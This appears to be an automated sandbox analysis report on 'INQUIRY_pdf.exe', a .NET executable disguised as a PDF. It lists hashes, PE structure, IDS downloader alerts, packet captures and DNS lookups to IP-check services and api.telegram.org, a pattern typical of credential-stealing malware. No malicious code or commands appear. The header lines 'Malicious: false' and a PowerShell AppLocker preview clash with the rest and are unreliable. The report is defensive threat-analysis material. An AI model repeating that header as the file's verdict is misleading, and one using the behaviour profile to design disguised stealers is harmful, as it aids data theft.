Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.915203811413493
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	INQUIRY_pdf.exe
File size:	768'512 bytes
MD5:	aad0e1f44c81477576e5b1a1a31f3513
SHA1:	aaa55fd38d696c09f0ba9b8511efac0c9d68b63a
SHA256:	5e8880438f921f4bd81f137cc9b4c44f1ba12b321a178d4d50a0601d75aef049
SHA512:	2f70c69d20a1d6f252c29bd8e2f01958a25e6710f8e4bbb47721a3a621be32503bfd66cf96981b77edf9a370492f4b6f60d1b7706c61dee3df5ca47724c8b44d
SSDEEP:	12288:k3qNW8BeviONx9C/1kmWRlgofeQELf5J2POsSY9K3sYKA:73wsmmWRlFQAPO1YwMA
TLSH:	0CF412E96B6A023AC67F9CF6A331B29487B9D96B54F2D34D0AD1A1D45F43B0251233C3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?;g..............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	0595150b64f0390f

Static PE Info

General

Entrypoint:	0x4bb8d6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673B3F8A [Mon Nov 18 13:22:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbb884	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x1ab8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb98dc	0xb9a00	d23ee8608bedd7abd6f72633d9f758e7	False	0.9246159511784512	COM executable for DOS	7.922613028322462	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x1ab8	0x1c00	5b6997388630c6b2520ea0d4d4c0df13	False	0.8044084821428571	data	7.21771859296457	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbe000	0xc	0x200	17b98c03467aa681df1c3cc544ec596e	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xbc100	0x1439	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9592428047131544
RT_GROUP_ICON	0xbd54c	0x14	data	1.05
RT_VERSION	0xbd570	0x348	data	0.43333333333333335
RT_MANIFEST	0xbd8c8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T18:40:57.524985+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49732	132.226.247.73	80	TCP
2024-11-18T18:40:58.743840+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49732	132.226.247.73	80	TCP
2024-11-18T18:40:59.520881+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49735	188.114.97.3	443	TCP
2024-11-18T18:41:00.446858+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49737	132.226.247.73	80	TCP
2024-11-18T18:41:03.287021+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49741	188.114.97.3	443	TCP
2024-11-18T18:41:09.538034+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49745	188.114.97.3	443	TCP
2024-11-18T18:41:13.853029+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49753	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:40:56.280473948 CET	49732	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:56.285563946 CET	80	49732	132.226.247.73	192.168.2.4
Nov 18, 2024 18:40:56.285650969 CET	49732	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:56.285932064 CET	49732	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:56.291115999 CET	80	49732	132.226.247.73	192.168.2.4
Nov 18, 2024 18:40:57.179640055 CET	80	49732	132.226.247.73	192.168.2.4
Nov 18, 2024 18:40:57.192354918 CET	49732	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:57.197483063 CET	80	49732	132.226.247.73	192.168.2.4
Nov 18, 2024 18:40:57.468889952 CET	80	49732	132.226.247.73	192.168.2.4
Nov 18, 2024 18:40:57.520354986 CET	49734	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:57.520401001 CET	443	49734	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:57.520467997 CET	49734	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:57.524985075 CET	49732	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:57.527765989 CET	49734	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:57.527786970 CET	443	49734	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:58.195058107 CET	443	49734	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:58.195254087 CET	49734	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:58.200834990 CET	49734	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:58.200855017 CET	443	49734	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:58.201128006 CET	443	49734	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:58.243738890 CET	49734	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:58.251065969 CET	49734	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:58.291332006 CET	443	49734	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:58.416821003 CET	443	49734	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:58.416889906 CET	443	49734	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:58.416987896 CET	49734	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:58.424002886 CET	49734	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:58.427261114 CET	49732	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:58.434259892 CET	80	49732	132.226.247.73	192.168.2.4
Nov 18, 2024 18:40:58.692256927 CET	80	49732	132.226.247.73	192.168.2.4
Nov 18, 2024 18:40:58.694494009 CET	49735	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:58.694535971 CET	443	49735	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:58.694888115 CET	49735	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:58.695323944 CET	49735	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:58.695337057 CET	443	49735	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:58.743839979 CET	49732	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:59.339071035 CET	443	49735	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:59.341109991 CET	49735	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:59.341140032 CET	443	49735	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:59.520911932 CET	443	49735	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:59.520977974 CET	443	49735	188.114.97.3	192.168.2.4
Nov 18, 2024 18:40:59.521136045 CET	49735	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:59.521656990 CET	49735	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:40:59.525233984 CET	49732	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:59.526289940 CET	49737	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:59.531478882 CET	80	49737	132.226.247.73	192.168.2.4
Nov 18, 2024 18:40:59.531560898 CET	49737	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:59.531682014 CET	49737	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:59.535494089 CET	80	49732	132.226.247.73	192.168.2.4
Nov 18, 2024 18:40:59.535579920 CET	49732	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:40:59.536567926 CET	80	49737	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:00.406240940 CET	80	49737	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:00.407608986 CET	49739	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:00.407666922 CET	443	49739	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:00.407764912 CET	49739	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:00.408018112 CET	49739	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:00.408031940 CET	443	49739	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:00.446857929 CET	49737	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:01.332807064 CET	443	49739	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:01.334510088 CET	49739	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:01.334546089 CET	443	49739	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:01.531059027 CET	443	49739	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:01.531133890 CET	443	49739	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:01.531236887 CET	49739	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:01.532871008 CET	49739	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:01.557400942 CET	49740	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:01.562385082 CET	80	49740	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:01.562517881 CET	49740	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:01.562603951 CET	49740	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:01.567477942 CET	80	49740	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:02.421694994 CET	80	49740	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:02.423178911 CET	49741	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:02.423224926 CET	443	49741	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:02.423322916 CET	49741	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:02.423597097 CET	49741	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:02.423610926 CET	443	49741	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:02.462486982 CET	49740	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:03.102961063 CET	443	49741	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:03.104863882 CET	49741	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:03.104893923 CET	443	49741	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:03.287048101 CET	443	49741	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:03.287118912 CET	443	49741	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:03.287178040 CET	49741	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:03.288515091 CET	49741	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:03.293715000 CET	49740	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:03.294770956 CET	49742	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:03.299834013 CET	80	49740	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:03.299853086 CET	80	49742	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:03.299887896 CET	49740	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:03.299928904 CET	49742	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:03.300045967 CET	49742	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:03.305063963 CET	80	49742	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:04.163429022 CET	80	49742	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:04.164985895 CET	49743	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:04.165040970 CET	443	49743	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:04.165131092 CET	49743	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:04.165436029 CET	49743	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:04.165451050 CET	443	49743	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:04.212662935 CET	49742	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:04.840374947 CET	443	49743	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:04.857459068 CET	49743	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:04.857490063 CET	443	49743	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:05.036231995 CET	443	49743	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:05.036299944 CET	443	49743	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:05.036375046 CET	49743	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:05.036760092 CET	49743	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:05.040867090 CET	49742	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:05.041822910 CET	49744	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:05.046401978 CET	80	49742	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:05.046451092 CET	49742	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:05.046726942 CET	80	49744	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:05.046796083 CET	49744	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:05.046948910 CET	49744	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:05.052067041 CET	80	49744	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:08.088654995 CET	80	49744	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:08.090610027 CET	49745	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:08.090662003 CET	443	49745	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:08.090739965 CET	49745	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:08.091145039 CET	49745	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:08.091161966 CET	443	49745	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:08.134396076 CET	49744	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:08.203176975 CET	80	49744	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:08.203233957 CET	49744	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:09.375233889 CET	443	49745	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:09.377171040 CET	49745	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:09.377204895 CET	443	49745	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:09.538074017 CET	443	49745	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:09.538150072 CET	443	49745	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:09.541821003 CET	49745	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:09.544338942 CET	49745	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:09.545515060 CET	49744	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:09.548381090 CET	49746	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:09.551306009 CET	80	49744	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:09.551904917 CET	49744	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:09.553237915 CET	80	49746	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:09.553430080 CET	49746	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:09.553430080 CET	49746	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:09.558365107 CET	80	49746	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:10.937068939 CET	80	49746	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:10.937495947 CET	80	49746	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:10.937851906 CET	49746	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:10.938139915 CET	80	49746	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:10.938211918 CET	49746	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:10.938798904 CET	49748	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:10.938846111 CET	443	49748	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:10.938915968 CET	49748	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:10.939188957 CET	49748	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:10.939198971 CET	443	49748	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:11.922763109 CET	443	49748	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:11.924356937 CET	49748	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:11.924401999 CET	443	49748	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:12.083513021 CET	443	49748	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:12.083585978 CET	443	49748	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:12.083661079 CET	49748	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:12.084140062 CET	49748	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:12.087165117 CET	49746	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:12.088680983 CET	49750	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:12.092997074 CET	80	49746	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:12.093053102 CET	49746	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:12.093682051 CET	80	49750	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:12.093753099 CET	49750	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:12.093825102 CET	49750	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:12.098737955 CET	80	49750	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:12.981564999 CET	80	49750	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:12.982852936 CET	49753	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:12.982908010 CET	443	49753	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:12.982970953 CET	49753	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:12.983227015 CET	49753	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:12.983237028 CET	443	49753	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:13.025047064 CET	49750	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:13.664277077 CET	443	49753	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:13.693353891 CET	49753	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:13.693394899 CET	443	49753	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:13.853183985 CET	443	49753	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:13.853367090 CET	443	49753	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:13.853436947 CET	49753	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:13.853991985 CET	49753	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:13.860863924 CET	49750	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:13.862054110 CET	49755	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:13.867170095 CET	80	49755	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:13.867235899 CET	80	49750	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:13.867290020 CET	49755	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:13.867325068 CET	49750	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:13.867472887 CET	49755	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:13.872853041 CET	80	49755	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:15.783998013 CET	80	49755	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:15.785574913 CET	49757	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:15.785646915 CET	443	49757	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:15.785793066 CET	49757	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:15.786092043 CET	49757	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:15.786106110 CET	443	49757	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:15.837668896 CET	49755	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:16.482199907 CET	443	49757	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:16.517573118 CET	49757	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:16.517606974 CET	443	49757	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:16.716785908 CET	443	49757	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:16.716866970 CET	443	49757	188.114.97.3	192.168.2.4
Nov 18, 2024 18:41:16.716988087 CET	49757	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:16.717427015 CET	49757	443	192.168.2.4	188.114.97.3
Nov 18, 2024 18:41:16.733635902 CET	49755	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:16.741995096 CET	49758	443	192.168.2.4	149.154.167.220
Nov 18, 2024 18:41:16.742041111 CET	443	49758	149.154.167.220	192.168.2.4
Nov 18, 2024 18:41:16.742142916 CET	49758	443	192.168.2.4	149.154.167.220
Nov 18, 2024 18:41:16.742626905 CET	49758	443	192.168.2.4	149.154.167.220
Nov 18, 2024 18:41:16.742645979 CET	443	49758	149.154.167.220	192.168.2.4
Nov 18, 2024 18:41:16.745028973 CET	80	49755	132.226.247.73	192.168.2.4
Nov 18, 2024 18:41:16.745132923 CET	49755	80	192.168.2.4	132.226.247.73
Nov 18, 2024 18:41:17.587292910 CET	443	49758	149.154.167.220	192.168.2.4
Nov 18, 2024 18:41:17.587393999 CET	49758	443	192.168.2.4	149.154.167.220
Nov 18, 2024 18:41:17.591598034 CET	49758	443	192.168.2.4	149.154.167.220
Nov 18, 2024 18:41:17.591624975 CET	443	49758	149.154.167.220	192.168.2.4
Nov 18, 2024 18:41:17.591886997 CET	443	49758	149.154.167.220	192.168.2.4
Nov 18, 2024 18:41:17.593367100 CET	49758	443	192.168.2.4	149.154.167.220
Nov 18, 2024 18:41:17.635332108 CET	443	49758	149.154.167.220	192.168.2.4
Nov 18, 2024 18:41:17.831974030 CET	443	49758	149.154.167.220	192.168.2.4
Nov 18, 2024 18:41:17.832056046 CET	443	49758	149.154.167.220	192.168.2.4
Nov 18, 2024 18:41:17.832094908 CET	49758	443	192.168.2.4	149.154.167.220
Nov 18, 2024 18:41:17.837255001 CET	49758	443	192.168.2.4	149.154.167.220
Nov 18, 2024 18:41:34.279326916 CET	49737	80	192.168.2.4	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:40:56.264502048 CET	60495	53	192.168.2.4	1.1.1.1
Nov 18, 2024 18:40:56.272098064 CET	53	60495	1.1.1.1	192.168.2.4
Nov 18, 2024 18:40:57.507713079 CET	54317	53	192.168.2.4	1.1.1.1
Nov 18, 2024 18:40:57.519452095 CET	53	54317	1.1.1.1	192.168.2.4
Nov 18, 2024 18:41:16.734376907 CET	54411	53	192.168.2.4	1.1.1.1
Nov 18, 2024 18:41:16.741288900 CET	53	54411	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 18:40:56.264502048 CET	192.168.2.4	1.1.1.1	0x6893	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:40:57.507713079 CET	192.168.2.4	1.1.1.1	0x21e1	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:41:16.734376907 CET	192.168.2.4	1.1.1.1	0x8981	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 18:40:56.272098064 CET	1.1.1.1	192.168.2.4	0x6893	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 18:40:56.272098064 CET	1.1.1.1	192.168.2.4	0x6893	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:40:56.272098064 CET	1.1.1.1	192.168.2.4	0x6893	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:40:56.272098064 CET	1.1.1.1	192.168.2.4	0x6893	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:40:56.272098064 CET	1.1.1.1	192.168.2.4	0x6893	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:40:56.272098064 CET	1.1.1.1	192.168.2.4	0x6893	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
